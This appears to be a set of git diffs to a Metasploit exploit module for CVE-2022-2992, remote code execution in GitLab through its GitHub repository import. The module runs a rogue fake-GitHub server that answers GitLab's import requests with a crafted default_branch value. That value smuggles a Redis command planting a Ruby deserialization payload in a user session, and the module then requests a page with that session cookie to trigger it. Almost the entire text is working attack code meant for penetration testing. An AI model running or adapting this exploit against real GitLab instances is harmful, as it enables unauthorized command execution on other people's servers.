+    gitlab_session_id = "session:gitlab:#{session_id}"
+    "ggg\r\n*3\r\n$3\r\nset\r\n$#{gitlab_session_id.size}\r\n#{gitlab_session_id}\r\n$#{serialized_payload.size}\r\n" + serialized_payload
+  end
+
+  def check
+    self.cookie = gitlab_sign_in(datastore['USERNAME'], datastore['PASSWORD'])
+
+    vprint_status('Trying to get the gitlab version')
+
+    version = Rex::Version.new(gitlab_version)
+
+    return CheckCode::Safe("Detected Gitlab version #{version} which is not vulnerable") unless (
+      version.between?(Rex::Version.new('11.10'), Rex::Version.new('15.1.6')) ||
+      version.between?(Rex::Version.new('15.2'), Rex::Version.new('15.2.4')) ||
+      version.between?(Rex::Version.new('15.3'), Rex::Version.new('15.3.2'))
+    )
+
+    # TODO: - report this
+    return CheckCode::Vulnerable("Detected Gitlab version #{version} which is vulnerable")
+  rescue Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException => e
+    return CheckCode::Unknown(e.message)
+  end
+
+  def cleanup
+    super
+    return unless @import_id
+
+    gitlab_delete_group(@group_id, api_token)
+    gitlab_revoke_access_token(api_token)
+    gitlab_sign_out
+  rescue Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException => e
+    print_error(e.message)
+  end
+
+  def exploit
+    start_service({
+      'Uri' => {
+        'Proc' => proc do |cli, req|
+          on_request_uri(cli, req)
+        end,
+        'Path' => '/'
+      }
+    })
+    execute_command(payload.encoded)
+  rescue Timeout::Error => e
+    fail_with(Failure::TimeoutExpired, e.message)
+  end
+
+  def execute_command(cmd, _opts = {})
+    vprint_status("Executing command: #{cmd}")
+    # due the AutoCheck mixin the cookie is set
+    self.cookie = gitlab_sign_in(datastore['USERNAME'], datastore['PASSWORD']) unless cookie
+    vprint_status("Session ID: #{session_id}")
+    vprint_status("Creating group #{group_name}")
+    @group_id = gitlab_create_group(group_name, api_token)
+    fail_with(Failure::UnexpectedReply, 'Failed to create a new group') unless @group_id
+    @redis_payload = redis_payload(cmd)
+    # import a repository from github
+    vprint_status('Importing a repository from github')
+    @import_id = gitlab_import_github_repo(group_name, datastore['NGROK_URL'], api_token)
+    sleep(5)
+    # execute the payload
+    send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, group_name),
+      'method' => 'GET',
+      'keep_cookies' => false,
+      'cookie' => "_gitlab_session=#{session_id}"
+    })
+  rescue Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException => e
+    fail_with(Failure::Unknown, e.message)
+  end
+
+  # Handle incoming requests from the server
+  def on_request_uri(cli, req)
+    super
+    # print_status("on_request_uri called: #{req.inspect}")
+    headers = { 'Content-Type' => 'application/json' }
+    data = {}.to_json
+    if req.uri.match(%r{/\w+/public.git/info/refs})
+      data = "001e# service=git-upload-pack\n00000154b5e17b851383bcee012364d0df7b67a3c4797b73 HEAD\x00multi_ack thin-pack side-band side-band-64k ofs-delta shallow deepen-since deepen-not deepen-relative no-progress include-tag multi_ack_detailed allow-tip-sha1-in-want allow-reachable-sha1-in-want no-done symref=HEAD:refs/heads/main filter object-format=sha1 agent=git/github-g04ce7e352669\n003db5e17b851383bcee012364d0df7b67a3c4797b73 refs/heads/main\n0000"
+      headers.merge!('Content-Type' => 'application/x-git-upload-pack-advertisement')
+    elsif req.uri.match(%r{/\w+/public.git/git-upload-pack})
+      data = <<~EOF
+        0008NAK\n0023\x02Enumerating objects: 3, done.\n0022\x02Counting objects:  33% (1/3)\r0022\x02Counting objects:  66% (2/3)\r0022\x02Counting objects: 100% (3/3)\r0029\x02Counting objects: 100% (3/3), done.\n0265\x01PACK\x00\x00\x00\x02\x00\x00\x00\x03\x9a(x\x9cmR\xcbn\xa3@\x00\xbb\xf3\x15sG\xdb0\xbc\x91\xdaUg(\x05\xb6\xc9\x00i\x08io<\xc20\x84Gx\x87|\xfdv\xb7\xd7\xfaf\xcb\x96,\xd9c\x7f>\x83L\xceu\xa8\xa5\x9a\x90\xe6\xb9\x9e\xe7R\x92&r\x96f\x86b\x18\x8a.\xe6\xb1\n\xb3\x14\x8a9\xe4\xe2i,\xda\x1eD\xac\xaaX\\\x03\xdc.\x15k(x\\\xbe\x84\xe7%\xf9\xa6\x0f\xac\xc9\xdb\xdf\x00\xaa*\x94d(+*\xe0\xa1 \x08\\\xda\xd65\x1b\xc7s\x0fl6:S\x02\x1e\x9b\xb6?_\xab\xf5\x99\xb2\xb1\x98\x92\x87/\xc3\x0f1z\xa5\x03\xa3\xe0\xd7?`\xcbv\t\xf0m\x1f\xbc\xbb6A\x87po\xfd\xd79\xc0\x81e\xc0)F\x08\x9b\x08\x058\xf8Sb\xaa\x07\xe6\x1e\xbfiE){\xb3\xd4\xbb\x0bB3\r\\\xe4t\xcb\x1b\xcd\xd96W\xeac\xfe\x11\xdb\x05\x9f\xbdB\xbe\xe3\x80"\xd2H\x8f\x8e\xcc\xa4:\xf9\xdct\xc3\x88Y\xa8_.\xa7tht\xb5B\xa8\x13\x96\n\x1f\xe4jt\xe1\xea\xf9\x1f\xbcVf7\x85\x85\xe3\xb1\xd9\x96\xedHt\x0e\xd8\xd7y\x8b\xe4\xcfY\xd4\x93\xbb\xb8\xf9\x14=\xff\x10D)\x8e\x87Lz\xado\xeb2m2\xe8\xf4W\x8a\x02\xc2\xf6u\x946\xcb\xf5\xd4C\xcb\xb6\xadN%\xd3]\xe5@:%\x1a\x81\xea\xbe\xc6\xd4\x98\x1a\xf1\x8f\xb4+w\x06,nf\xca*\x1a\x94+\xf3\xa2\xb5U\xc5\xa3\x7f\xaaH\x1b_\xc2;<\x1en\x1bB\x19\xcd\xb2\xc5\xe0\'\x0e\x08\xda\x18#\'\xf7/\xba\xb5\xa7\x86\xe0\xf1\xb50k\xc7\x9btK\xca\xb3I\x82\xa2\x08\xe7]%\r}7\xedb=\x0cO\xd8\x94}{%\xfd\xee\xfdP\xdd\xed\xac\xfe\xea\x80\xcd\x8b\xcb\xb7y\xbd\xf3\xb2\xaaQ\xd8@\xf8\xed\xac+\x92_F\xd2^v\x9c\xd4\x14\xca\"\xac?\xae\x9b;I\xf9\xd5|K$\xcd\xec^\xc6\xc0\tm\xabFO\x1cx\xf2\x02\xe9\x95\xfb\xde\xcc"/?/\xc6\xb9\r\x1bY\\\x81\xefc\xfc\x05\xc7\xd4\xcb\x13\xa5\x02x\x9c340031Q\x08rut\xf1u\xd5\xcbMa8\x96\x983g{\xab\xdfn\x86\xe6\xe7\xc2\xd9fo\x9f~\x7f\x94\xe5\x04\x00\xe1!\x0e\xe6=x\x9cSV((M\xca\xc9L\xe6JLL\xe4\x02\x00\x1c^\x03\xfa\xd2_\xcc\xa1\xa6\x81\xa3\xb6\xeeSL\x96\t\x0c\xb4\xf8\xb7>\xa90006\x01\xf8003a\x02Total 3 (delta 0), reused 0 (delta 0), pack-reused 0\n0000
+      EOF
+      # send_response(cli, data, { 'Content-Type' => 'application/x-git-upload-pack-result' })
+      headers.merge!({ 'Content-Type' => 'application/x-git-upload-pack-result' })
+    elsif req.uri.match(%r{(/api/v3)?/repositories/(\w{1,20})})
+      name = Rex::Text.rand_text_alpha(8..12)
+      id = Regexp.last_match(1)
+      data = {
+        id: id,
+        name: name,
+        full_name: "#{name}/name",
+        clone_url: "#{datastore['NGROK_URL']}/#{name}/public.git"
+      }.to_json
+    elsif req.uri.match(%r{/api/v3/repos/\w+/\w+})
+      data = {
+        'default_branch' => {
+          'to_s' => {
+            'bytesize' => 3,
+            'to_s' => @redis_payload
+          }
+        }
+      }.to_json
+    elsif req.uri.starts_with?('/api/v3/rate_limit')
+      headers.merge!({
+        'X-RateLimit-Limit' => '100000',
+        'X-RateLimit-Remaining' => '100000'
+      })
+    end
+    send_response(cli, data, headers)
+  end
+
+end

--- a/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb
+++ b/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb
@@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote
           then deserialize it when trying to load a user session, resulting in RCE.
         },
         'Author' => [
-          'vakzz', # discovery
+          'William Bowling (vakzz)', # discovery
           'Heyder Andrade <https://infosec.exchange/@heyder>', # msf module
           'RedWay Security <https://infosec.exchange/@redway>', # PoC
         ],
@@ -82,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def api_token
-    @api_token ||= gitlab_create_access_token
+    @api_token ||= gitlab_create_personal_access_token
   end
 
   def session_id
@@ -128,7 +128,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return unless @import_id
 
     gitlab_delete_group(@group_id, api_token)
-    gitlab_revoke_access_token(api_token)
+    gitlab_revoke_personal_access_token(api_token)
     gitlab_sign_out
   rescue Msf::Exploit::Remote::HTTP::Gitlab::Error => e
     print_error("#{e.class} - #{e.message}")
@@ -156,12 +156,18 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("Session ID: #{session_id}")
     vprint_status("Creating group #{group_name}")
     # We need group id for the clenaup method
-    @group_id = gitlab_create_group(group_name, api_token)
+    @group_id = gitlab_create_group(group_name, api_token)['id']
     fail_with(Failure::UnexpectedReply, 'Failed to create a new group') unless @group_id
     @redis_payload = redis_payload(cmd)
     # import a repository from github
     vprint_status('Importing a repository from github')
-    @import_id = gitlab_import_github_repo(group_name, datastore['NGROK_URL'], api_token)
+    @import_id = gitlab_import_github_repo(
+      group_name: group_name,
+      github_hostname: datastore['NGROK_URL'],
+      api_token: api_token
+    )['id']
+    # binding.pry
+    fail_with(Failure::UnexpectedReply, 'Failed to import a repository from github') unless @import_id
     # wait for the import tasks to finish
     select(nil, nil, nil, datastore['IMPORT_DELAY'])
     # execute the payload

--- a/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb
+++ b/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb
@@ -23,10 +23,10 @@ class MetasploitModule < Msf::Exploit::Remote
         'Name' => 'Remote Command Execution via Github import',
         'Description' => %q{
           An authenticated user can import a repository from Github into Gitlab.
-          One can try to import from an attacker's controller server which
-          replies with a Redis' serialization protocol object in the nested
-          default_branch making the Gitlab to cache this object on redis and
-          then the Gitlab to deserialize it when trying to load an user session.
+          If a user attempts to import a repo from an attacker-controlled server,
+          the server will reply with a Redis serialization protocol object in the nested
+          `default_branch`. Gitlab will cache this object and
+          then deserialize it when trying to load a user session, resulting in RCE.
         },
         'Author' => [
           'vakzz', # discovery

--- a/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb
+++ b/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb
@@ -92,7 +92,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    self.cookie = gitlab_sign_in(datastore['USERNAME'], datastore['PASSWORD'])
+    self.cookie = gitlab_sign_in(datastore['USERNAME'], datastore['PASSWORD']) unless cookie
 
     vprint_status('Trying to get the gitlab version')
 
@@ -106,8 +106,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # TODO: - report this
     return CheckCode::Vulnerable("Detected Gitlab version #{version} which is vulnerable")
-  rescue Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException => e
-    return CheckCode::Unknown(e.message)
+  rescue Msf::Exploit::Remote::HTTP::Gitlab::Error => e
+    return CheckCode::Unknown("#{e.class} - #{e.message}")
   end
 
   def cleanup
@@ -117,8 +117,8 @@ class MetasploitModule < Msf::Exploit::Remote
     gitlab_delete_group(@group_id, api_token)
     gitlab_revoke_access_token(api_token)
     gitlab_sign_out
-  rescue Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException => e
-    print_error(e.message)
+  rescue Msf::Exploit::Remote::HTTP::Gitlab::Error => e
+    print_error("#{e.class} - #{e.message}")
   end
 
   def exploit
@@ -137,10 +137,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def execute_command(cmd, _opts = {})
     vprint_status("Executing command: #{cmd}")
-    # due the AutoCheck mixin the cookie is set
+    # due the AutoCheck mixin and the keep_cookies option the cookie is already set
     self.cookie = gitlab_sign_in(datastore['USERNAME'], datastore['PASSWORD']) unless cookie
     vprint_status("Session ID: #{session_id}")
     vprint_status("Creating group #{group_name}")
+    # We need group id for the clenaup method
     @group_id = gitlab_create_group(group_name, api_token)
     fail_with(Failure::UnexpectedReply, 'Failed to create a new group') unless @group_id
     @redis_payload = redis_payload(cmd)
@@ -155,8 +156,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'keep_cookies' => false,
       'cookie' => "_gitlab_session=#{session_id}"
     })
-  rescue Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException => e
-    fail_with(Failure::Unknown, e.message)
+  rescue Msf::Exploit::Remote::HTTP::Gitlab::Error => e
+    fail_with(Failure::Unknown, "#{e.class} - #{e.message}")
   end
 
   # Handle incoming requests from the server
@@ -172,7 +173,6 @@ class MetasploitModule < Msf::Exploit::Remote
       data = <<~EOF
         0008NAK\n0023\x02Enumerating objects: 3, done.\n0022\x02Counting objects:  33% (1/3)\r0022\x02Counting objects:  66% (2/3)\r0022\x02Counting objects: 100% (3/3)\r0029\x02Counting objects: 100% (3/3), done.\n0265\x01PACK\x00\x00\x00\x02\x00\x00\x00\x03\x9a(x\x9cmR\xcbn\xa3@\x00\xbb\xf3\x15sG\xdb0\xbc\x91\xdaUg(\x05\xb6\xc9\x00i\x08io<\xc20\x84Gx\x87|\xfdv\xb7\xd7\xfaf\xcb\x96,\xd9c\x7f>\x83L\xceu\xa8\xa5\x9a\x90\xe6\xb9\x9e\xe7R\x92&r\x96f\x86b\x18\x8a.\xe6\xb1\n\xb3\x14\x8a9\xe4\xe2i,\xda\x1eD\xac\xaaX\\\x03\xdc.\x15k(x\\\xbe\x84\xe7%\xf9\xa6\x0f\xac\xc9\xdb\xdf\x00\xaa*\x94d(+*\xe0\xa1 \x08\\\xda\xd65\x1b\xc7s\x0fl6:S\x02\x1e\x9b\xb6?_\xab\xf5\x99\xb2\xb1\x98\x92\x87/\xc3\x0f1z\xa5\x03\xa3\xe0\xd7?`\xcbv\t\xf0m\x1f\xbc\xbb6A\x87po\xfd\xd79\xc0\x81e\xc0)F\x08\x9b\x08\x058\xf8Sb\xaa\x07\xe6\x1e\xbfiE){\xb3\xd4\xbb\x0bB3\r\\\xe4t\xcb\x1b\xcd\xd96W\xeac\xfe\x11\xdb\x05\x9f\xbdB\xbe\xe3\x80"\xd2H\x8f\x8e\xcc\xa4:\xf9\xdct\xc3\x88Y\xa8_.\xa7tht\xb5B\xa8\x13\x96\n\x1f\xe4jt\xe1\xea\xf9\x1f\xbcVf7\x85\x85\xe3\xb1\xd9\x96\xedHt\x0e\xd8\xd7y\x8b\xe4\xcfY\xd4\x93\xbb\xb8\xf9\x14=\xff\x10D)\x8e\x87Lz\xado\xeb2m2\xe8\xf4W\x8a\x02\xc2\xf6u\x946\xcb\xf5\xd4C\xcb\xb6\xadN%\xd3]\xe5@:%\x1a\x81\xea\xbe\xc6\xd4\x98\x1a\xf1\x8f\xb4+w\x06,nf\xca*\x1a\x94+\xf3\xa2\xb5U\xc5\xa3\x7f\xaaH\x1b_\xc2;<\x1en\x1bB\x19\xcd\xb2\xc5\xe0\'\x0e\x08\xda\x18#\'\xf7/\xba\xb5\xa7\x86\xe0\xf1\xb50k\xc7\x9btK\xca\xb3I\x82\xa2\x08\xe7]%\r}7\xedb=\x0cO\xd8\x94}{%\xfd\xee\xfdP\xdd\xed\xac\xfe\xea\x80\xcd\x8b\xcb\xb7y\xbd\xf3\xb2\xaaQ\xd8@\xf8\xed\xac+\x92_F\xd2^v\x9c\xd4\x14\xca\"\xac?\xae\x9b;I\xf9\xd5|K$\xcd\xec^\xc6\xc0\tm\xabFO\x1cx\xf2\x02\xe9\x95\xfb\xde\xcc"/?/\xc6\xb9\r\x1bY\\\x81\xefc\xfc\x05\xc7\xd4\xcb\x13\xa5\x02x\x9c340031Q\x08rut\xf1u\xd5\xcbMa8\x96\x983g{\xab\xdfn\x86\xe6\xe7\xc2\xd9fo\x9f~\x7f\x94\xe5\x04\x00\xe1!\x0e\xe6=x\x9cSV((M\xca\xc9L\xe6JLL\xe4\x02\x00\x1c^\x03\xfa\xd2_\xcc\xa1\xa6\x81\xa3\xb6\xeeSL\x96\t\x0c\xb4\xf8\xb7>\xa90006\x01\xf8003a\x02Total 3 (delta 0), reused 0 (delta 0), pack-reused 0\n0000
       EOF
-      # send_response(cli, data, { 'Content-Type' => 'application/x-git-upload-pack-result' })
       headers.merge!({ 'Content-Type' => 'application/x-git-upload-pack-result' })
     elsif req.uri.match(%r{(/api/v3)?/repositories/(\w{1,20})})
       name = Rex::Text.rand_text_alpha(8..12)

--- a/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb
+++ b/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb
@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'Remote Command Execution via Github import',
+        'Name' => 'Gitlab Github Repo Import Deserialization RCE',
         'Description' => %q{
           An authenticated user can import a repository from Github into Gitlab.
           If a user attempts to import a repo from an attacker-controlled server,
@@ -70,7 +70,8 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptString.new('USERNAME', [true, 'The username to authenticate as', nil]),
         OptString.new('PASSWORD', [true, 'The password for the specified username', nil]),
-        OptString.new('NGROK_URL', [true, 'The Ngrok tunnel url', '/'])
+        OptString.new('NGROK_URL', [true, 'The Ngrok tunnel url', '/']),
+        OptInt.new('IMPORT_DELAY', [true, 'Time to wait from the import task before try to trigger the payload', 5]),
       ]
     )
     deregister_options('GIT_URI')
@@ -161,7 +162,8 @@ class MetasploitModule < Msf::Exploit::Remote
     # import a repository from github
     vprint_status('Importing a repository from github')
     @import_id = gitlab_import_github_repo(group_name, datastore['NGROK_URL'], api_token)
-    sleep(5)
+    # wait for the import tasks to finish
+    select(nil, nil, nil, datastore['IMPORT_DELAY'])
     # execute the payload
     send_request_cgi({
       'uri' => normalize_uri(target_uri.path, group_name),

--- a/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb
+++ b/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb
@@ -7,13 +7,13 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   prepend Msf::Exploit::Remote::AutoCheck
-  include Msf::Exploit::Git
+
   include Msf::Exploit::Git::SmartHttp
-  include Msf::Exploit::RubyDeserialization
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Remote::HttpServer
   include Msf::Exploit::Remote::HTTP::Gitlab
-  
+  include Msf::Exploit::RubyDeserialization
+
   attr_accessor :cookie
 
   def initialize(info = {})
@@ -26,7 +26,7 @@ class MetasploitModule < Msf::Exploit::Remote
           One can try to import from an attacker's controller server which
           replies with a Redis' serialization protocol object in the nested
           default_branch making the Gitlab to cache this object on redis and
-          the redis to deserialize it and trigger execute the payload.
+          then the Gitlab to deserialize it when trying to load an user session.
         },
         'Author' => [
           'vakzz', # discovery
@@ -73,6 +73,7 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('NGROK_URL', [true, 'The Ngrok tunnel url', '/'])
       ]
     )
+    deregister_options('GIT_URI')
   end
 
   def group_name
@@ -90,7 +91,11 @@ class MetasploitModule < Msf::Exploit::Remote
   def redis_payload(cmd)
     serialized_payload = generate_ruby_deserialization_for_command(cmd)
     gitlab_session_id = "session:gitlab:#{session_id}"
-    "ggg\r\n*3\r\n$3\r\nset\r\n$#{gitlab_session_id.size}\r\n#{gitlab_session_id}\r\n$#{serialized_payload.size}\r\n" + serialized_payload
+    # A RESP array of 3 elements (https://redis.io/docs/reference/protocol-spec/)
+    # The command set
+    # The gitlab session to load the payload from
+    # The Payload itself. A Ruby serialized command
+    "*3\r\n$3\r\nset\r\n$#{gitlab_session_id.size}\r\n#{gitlab_session_id}\r\n$#{serialized_payload.size}\r\n#{serialized_payload}"
   end
 
   def check
@@ -140,7 +145,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def execute_command(cmd, _opts = {})
     vprint_status("Executing command: #{cmd}")
-    # due the AutoCheck mixin and the keep_cookies option the cookie is already set
+    # due the AutoCheck mixin and the keep_cookies option the cookie might be already seted
     self.cookie = gitlab_sign_in(datastore['USERNAME'], datastore['PASSWORD']) unless cookie
     vprint_status("Session ID: #{session_id}")
     vprint_status("Creating group #{group_name}")
@@ -166,7 +171,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def setup_repo_structure
     blob_object_fname = "#{Rex::Text.rand_text_alpha(5..10)}.txt"
     blob_data = Rex::Text.rand_text_alpha(5..12)
-    blob_object = GitObject.build_blob_object(blob_data)
+    blob_object = Msf::Exploit::Git::GitObject.build_blob_object(blob_data)
 
     tree_data =
       {
@@ -174,24 +179,21 @@ class MetasploitModule < Msf::Exploit::Remote
         file_name: blob_object_fname,
         sha1: blob_object.sha1
       }
-    tree_object = GitObject.build_tree_object(tree_data)
+    tree_object = Msf::Exploit::Git::GitObject.build_tree_object(tree_data)
 
-    commit_obj = GitObject.build_commit_object(tree_sha1: tree_object.sha1)
+    commit_obj = Msf::Exploit::Git::GitObject.build_commit_object(tree_sha1: tree_object.sha1)
 
-    git_objs =
-      [
-        commit_obj, tree_object, blob_object
-      ]
+    git_objs = [ commit_obj, tree_object, blob_object ]
 
     @refs =
       {
         'HEAD' => 'refs/heads/main',
         'refs/heads/main' => commit_obj.sha1
       }
-    @packfile = Packfile.new('2', git_objs)
+    @packfile = Msf::Exploit::Git::Packfile.new('2', git_objs)
   end
 
-  # Handle incoming requests from the server
+  # Handle incoming requests from Gitlab server
   def on_request_uri(cli, req)
     super
     headers = { 'Content-Type' => 'application/json' }
@@ -213,16 +215,18 @@ class MetasploitModule < Msf::Exploit::Remote
       }.to_json
     when %r{/\w+/public.git/info/refs}
       data = build_pkt_line_advertise(@refs)
-      headers.merge!('Content-Type' => 'application/x-git-upload-pack-advertisement')
+      headers.merge!({ 'Content-Type' => 'application/x-git-upload-pack-advertisement' })
     when %r{/\w+/public.git/git-upload-pack}
       data = build_pkt_line_sideband(@packfile)
       headers.merge!({ 'Content-Type' => 'application/x-git-upload-pack-result' })
     when %r{/api/v3/repos/\w+/\w+}
+      bytes_size = rand(3..8)
       data = {
         'default_branch' => {
           'to_s' => {
-            'bytesize' => 3,
-            'to_s' => @redis_payload
+            'bytesize' => bytes_size,
+            'to_s' => "+#{Rex::Text.rand_text_alpha_lower(bytes_size)}\r\n#{@redis_payload}"
+            # using a simple string format for RESP
           }
         }
       }.to_json

--- a/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb
+++ b/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb
@@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def redis_payload(cmd)
-    serialized_payload = generate_ruby_deserialization_for_command(cmd)
+    serialized_payload = generate_ruby_deserialization_for_command(cmd, :net_writeadapter)
     gitlab_session_id = "session:gitlab:#{session_id}"
     # A RESP array of 3 elements (https://redis.io/docs/reference/protocol-spec/)
     # The command set

--- a/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb
+++ b/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb
@@ -7,11 +7,13 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Git
+  include Msf::Exploit::Git::SmartHttp
   include Msf::Exploit::RubyDeserialization
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Remote::HttpServer
   include Msf::Exploit::Remote::HTTP::Gitlab
-
+  
   attr_accessor :cookie
 
   def initialize(info = {})
@@ -122,6 +124,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    setup_repo_structure
     start_service({
       'Uri' => {
         'Proc' => proc do |cli, req|
@@ -160,30 +163,61 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::Unknown, "#{e.class} - #{e.message}")
   end
 
+  def setup_repo_structure
+    blob_object_fname = "#{Rex::Text.rand_text_alpha(5..10)}.txt"
+    blob_data = Rex::Text.rand_text_alpha(5..12)
+    blob_object = GitObject.build_blob_object(blob_data)
+
+    tree_data =
+      {
+        mode: '100644',
+        file_name: blob_object_fname,
+        sha1: blob_object.sha1
+      }
+    tree_object = GitObject.build_tree_object(tree_data)
+
+    commit_obj = GitObject.build_commit_object(tree_sha1: tree_object.sha1)
+
+    git_objs =
+      [
+        commit_obj, tree_object, blob_object
+      ]
+
+    @refs =
+      {
+        'HEAD' => 'refs/heads/main',
+        'refs/heads/main' => commit_obj.sha1
+      }
+    @packfile = Packfile.new('2', git_objs)
+  end
+
   # Handle incoming requests from the server
   def on_request_uri(cli, req)
     super
-    # print_status("on_request_uri called: #{req.inspect}")
     headers = { 'Content-Type' => 'application/json' }
     data = {}.to_json
-    if req.uri.match(%r{/\w+/public.git/info/refs})
-      data = "001e# service=git-upload-pack\n00000154b5e17b851383bcee012364d0df7b67a3c4797b73 HEAD\x00multi_ack thin-pack side-band side-band-64k ofs-delta shallow deepen-since deepen-not deepen-relative no-progress include-tag multi_ack_detailed allow-tip-sha1-in-want allow-reachable-sha1-in-want no-done symref=HEAD:refs/heads/main filter object-format=sha1 agent=git/github-g04ce7e352669\n003db5e17b851383bcee012364d0df7b67a3c4797b73 refs/heads/main\n0000"
-      headers.merge!('Content-Type' => 'application/x-git-upload-pack-advertisement')
-    elsif req.uri.match(%r{/\w+/public.git/git-upload-pack})
-      data = <<~EOF
-        0008NAK\n0023\x02Enumerating objects: 3, done.\n0022\x02Counting objects:  33% (1/3)\r0022\x02Counting objects:  66% (2/3)\r0022\x02Counting objects: 100% (3/3)\r0029\x02Counting objects: 100% (3/3), done.\n0265\x01PACK\x00\x00\x00\x02\x00\x00\x00\x03\x9a(x\x9cmR\xcbn\xa3@\x00\xbb\xf3\x15sG\xdb0\xbc\x91\xdaUg(\x05\xb6\xc9\x00i\x08io<\xc20\x84Gx\x87|\xfdv\xb7\xd7\xfaf\xcb\x96,\xd9c\x7f>\x83L\xceu\xa8\xa5\x9a\x90\xe6\xb9\x9e\xe7R\x92&r\x96f\x86b\x18\x8a.\xe6\xb1\n\xb3\x14\x8a9\xe4\xe2i,\xda\x1eD\xac\xaaX\\\x03\xdc.\x15k(x\\\xbe\x84\xe7%\xf9\xa6\x0f\xac\xc9\xdb\xdf\x00\xaa*\x94d(+*\xe0\xa1 \x08\\\xda\xd65\x1b\xc7s\x0fl6:S\x02\x1e\x9b\xb6?_\xab\xf5\x99\xb2\xb1\x98\x92\x87/\xc3\x0f1z\xa5\x03\xa3\xe0\xd7?`\xcbv\t\xf0m\x1f\xbc\xbb6A\x87po\xfd\xd79\xc0\x81e\xc0)F\x08\x9b\x08\x058\xf8Sb\xaa\x07\xe6\x1e\xbfiE){\xb3\xd4\xbb\x0bB3\r\\\xe4t\xcb\x1b\xcd\xd96W\xeac\xfe\x11\xdb\x05\x9f\xbdB\xbe\xe3\x80"\xd2H\x8f\x8e\xcc\xa4:\xf9\xdct\xc3\x88Y\xa8_.\xa7tht\xb5B\xa8\x13\x96\n\x1f\xe4jt\xe1\xea\xf9\x1f\xbcVf7\x85\x85\xe3\xb1\xd9\x96\xedHt\x0e\xd8\xd7y\x8b\xe4\xcfY\xd4\x93\xbb\xb8\xf9\x14=\xff\x10D)\x8e\x87Lz\xado\xeb2m2\xe8\xf4W\x8a\x02\xc2\xf6u\x946\xcb\xf5\xd4C\xcb\xb6\xadN%\xd3]\xe5@:%\x1a\x81\xea\xbe\xc6\xd4\x98\x1a\xf1\x8f\xb4+w\x06,nf\xca*\x1a\x94+\xf3\xa2\xb5U\xc5\xa3\x7f\xaaH\x1b_\xc2;<\x1en\x1bB\x19\xcd\xb2\xc5\xe0\'\x0e\x08\xda\x18#\'\xf7/\xba\xb5\xa7\x86\xe0\xf1\xb50k\xc7\x9btK\xca\xb3I\x82\xa2\x08\xe7]%\r}7\xedb=\x0cO\xd8\x94}{%\xfd\xee\xfdP\xdd\xed\xac\xfe\xea\x80\xcd\x8b\xcb\xb7y\xbd\xf3\xb2\xaaQ\xd8@\xf8\xed\xac+\x92_F\xd2^v\x9c\xd4\x14\xca\"\xac?\xae\x9b;I\xf9\xd5|K$\xcd\xec^\xc6\xc0\tm\xabFO\x1cx\xf2\x02\xe9\x95\xfb\xde\xcc"/?/\xc6\xb9\r\x1bY\\\x81\xefc\xfc\x05\xc7\xd4\xcb\x13\xa5\x02x\x9c340031Q\x08rut\xf1u\xd5\xcbMa8\x96\x983g{\xab\xdfn\x86\xe6\xe7\xc2\xd9fo\x9f~\x7f\x94\xe5\x04\x00\xe1!\x0e\xe6=x\x9cSV((M\xca\xc9L\xe6JLL\xe4\x02\x00\x1c^\x03\xfa\xd2_\xcc\xa1\xa6\x81\xa3\xb6\xeeSL\x96\t\x0c\xb4\xf8\xb7>\xa90006\x01\xf8003a\x02Total 3 (delta 0), reused 0 (delta 0), pack-reused 0\n0000
-      EOF
-      headers.merge!({ 'Content-Type' => 'application/x-git-upload-pack-result' })
-    elsif req.uri.match(%r{(/api/v3)?/repositories/(\w{1,20})})
-      name = Rex::Text.rand_text_alpha(8..12)
+    case req.uri
+    when %r{/api/v3/rate_limit}
+      headers.merge!({
+        'X-RateLimit-Limit' => '100000',
+        'X-RateLimit-Remaining' => '100000'
+      })
+    when %r{/api/v3/repositories/(\w{1,20})}
       id = Regexp.last_match(1)
+      name = Rex::Text.rand_text_alpha(8..12)
       data = {
         id: id,
         name: name,
         full_name: "#{name}/name",
         clone_url: "#{datastore['NGROK_URL']}/#{name}/public.git"
       }.to_json
